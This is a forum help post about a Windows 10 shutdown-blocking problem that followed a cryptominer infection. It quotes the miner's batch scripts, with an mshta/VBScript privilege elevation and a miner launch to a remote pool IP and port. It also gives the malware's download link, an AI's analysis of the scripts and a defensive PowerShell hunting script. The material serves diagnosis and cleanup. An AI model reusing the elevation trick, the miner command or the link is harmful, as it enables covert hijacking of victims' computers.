Program Manager blocks shutdown or restart
Ever since I ran a malicious mining program from someone else on 8 July 2025 (
https://www.mediafire.com/file/xhmj7o8rrh8v1l4/CHB_ReNamer_v2.7z/file , please do not download this file, because it is a malicious mining program),
every time I shut down or restart Windows 10, the blue shutdown/restart screen shows "Program Manager: This app is preventing you from shutting down."
· Used msconfig to disable all non-Microsoft services and chose "Selective startup: Load startup items"; no effect;
· Used Task Manager to disable all startup items; no effect;
· Have never downloaded QQ Pinyin (the QQ input method);
· Searched the registry for "Program Manager" and "programmanager"; no results;
· Windows Defender has run a full scan and every finding was dealt with, yet the shutdown-blocking problem remains;
Earlier I enabled "Turn off automatic termination of applications that block or cancel shutdown" in gpedit.msc, and in addition created a string value AutoEndTasks set to 1 under HKEY_USERS\.DEFAULT\Control Panel\Desktop in regedit, so I can now shut down or restart without it blocking me. But out of sight is still not out of mind; I want to remove it completely. Asking for a solution.
Attached is an AI's interpretation of the mining program:
Me:
@echo off
PUSHD %~DP0 & cd /d "%~dp0"
%1 %2
config.exe -n "license.exe" >nul
move /y x64Hider.exe ../x64.exe >nul 2>nul
taskkill /f /im conhost.exe
exit
AI:
This batch script appears to be performing several operations, some of which seem suspicious. Let me break down what it's doing:
@echo off - Turns off command echoing for cleaner output
PUSHD %~DP0 & cd /d "%~dp0" - Changes to the directory where the script is located
%1 %2 - Executes any arguments passed to the script
Runs config.exe with parameters to create/modify license.exe (output is hidden)
Moves x64Hider.exe to parent directory as x64.exe (output is hidden)
Force kills conhost.exe (console host process)
Exits
Red flags/warning signs:
The script hides all output (>nul and 2>nul)
It's modifying/creating executable files
It's killing system processes (conhost.exe)
There's a lot of whitespace, possibly to obscure the code
The naming ("Hider") suggests hiding activity
This appears to be part of some software license manipulation or potentially malicious activity. I would strongly advise against running unknown scripts like this as they could:
Modify system files
Install malware
Bypass software licensing
Disable security features
If you encountered this unexpectedly, you should scan your system with antivirus software.
Me:
@echo off
PUSHD %~DP0 & cd /d "%~dp0"
%1 %2
mshta vbscript:createobject("shell.application").shellexecute("%~s0","goto :target","","runas",1)(window.close)&goto :eof
:target
taskkill /f /t /im license.exe >nul 2>nul
license.exe -o 188.116.22.105:35516 -t 3 -B --cpu-priority=0
AI:
This script is highly suspicious and appears to be part of a cryptocurrency mining malware or a trojan. Here's what it does:
Breakdown of the Script:
Elevates Privileges (Runs as Admin):
mshta vbscript:createobject("shell.application").shellexecute("%~s0","goto :target","","runas",1)(window.close)&goto :eof
Uses mshta + VBScript to re-launch itself with admin rights (runas).
This allows it to bypass user permissions.
Kills Existing Miner Process:
taskkill /f /t /im license.exe >nul 2>nul
Forcefully terminates any existing license.exe (likely a disguised miner).
Starts a Hidden Cryptocurrency Miner:
license.exe -o 188.116.22.105:35516 -t 3 -B --cpu-priority=0
license.exe is not a legitimate license manager—it's a miner (likely XMRig or similar).
Connects to a remote server (188.116.22.105:35516) to mine cryptocurrency.
-t 3 → Uses 3 CPU threads.
-B → Runs in the background (hidden).
--cpu-priority=0 → Maximizes CPU usage for mining.
Why This Is Dangerous:
Secretly uses your CPU to mine cryptocurrency for an attacker.
Slows down your PC due to high CPU usage.
Hides itself (no visible windows, output suppressed with >nul).
Persistence: Likely installed to run at startup.
Network activity: Communicates with a remote server (potential backdoor).
What You Should Do:
Do NOT run this script.
Scan your system with:
Malwarebytes (https://www.malwarebytes.com)
HitmanPro (https://www.hitmanpro.com)
Windows Defender (Full scan)
Check Task Manager for suspicious processes (license.exe, high CPU usage).
Block the IP 188.116.22.105 in your firewall (if already infected).
Remove the files (license.exe, config.exe, x64Hider.exe).
Conclusion:
This is malware designed to turn your computer into a crypto miner without your consent. If you found this on your system, you are likely infected. Take immediate action to remove it.
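The checks the AI reply lists (look for license.exe, connections to 188.116.22.105:35516, startup persistence, the dropper's files) as one read-only hunting script; this is an added example, not part of the original post or of any tool mentioned in it. It assumes an elevated PowerShell session on the affected Windows 10 machine and uses only the names, address and port quoted in the batch scripts above.

```powershell
# Added example, not from the original post. Run in an elevated PowerShell on the
# affected Windows 10 machine; names, pool address and port come from the batch
# scripts quoted above. Read-only: it reports findings, it does not delete anything.
$SuspectNames = @('license.exe', 'config.exe', 'x64Hider.exe', 'x64.exe')
$PoolHost     = '188.116.22.105'
$PoolPort     = 35516
$NameRegex    = 'license\.exe|config\.exe|x64Hider|x64\.exe|mshta'

Write-Host "== Processes matching the miner by image name or pool argument =="
Get-CimInstance Win32_Process | Where-Object {
    ($SuspectNames -contains $_.Name) -or
    ($_.CommandLine -and $_.CommandLine -match [regex]::Escape("${PoolHost}:${PoolPort}"))
} | Select-Object ProcessId, Name, ExecutablePath, CommandLine | Format-List

Write-Host "== Live TCP connections to the pool address =="
Get-NetTCPConnection -RemoteAddress $PoolHost -ErrorAction SilentlyContinue |
    Select-Object LocalPort, RemotePort, State, OwningProcess

# The desktop window titled "Program Manager" (window class Progman) belongs to
# explorer.exe. If any other process owns a window with that title, examine it.
Write-Host "== Owner of the 'Program Manager' window =="
Get-Process | Where-Object { $_.MainWindowTitle -eq 'Program Manager' } |
    Select-Object Id, ProcessName, Path

Write-Host "== Persistence: Run/RunOnce keys =="
$RunKeys = @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
             'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce',
             'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
             'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce')
foreach ($key in $RunKeys) {
    if (-not (Test-Path $key)) { continue }
    (Get-ItemProperty $key).PSObject.Properties |
        Where-Object { $_.Name -notlike 'PS*' -and "$($_.Value)" -match $NameRegex } |
        ForEach-Object { "$key : $($_.Name) = $($_.Value)" }
}

Write-Host "== Persistence: scheduled tasks launching the components =="
Get-ScheduledTask | Where-Object {
    ($_.Actions | ForEach-Object { "$($_.Execute) $($_.Arguments)" }) -match $NameRegex
} | Select-Object TaskName, TaskPath, State

Write-Host "== Files with the dropper's names under the user profile and ProgramData =="
Get-ChildItem -Path $env:USERPROFILE, $env:ProgramData -Recurse -Force -Include $SuspectNames `
    -ErrorAction SilentlyContinue | Select-Object FullName, Length, LastWriteTime
```

Any process, task or Run entry this prints that you did not create yourself is the thing to quarantine with the scanners named above; the OwningProcess id from the TCP section maps directly to the process list.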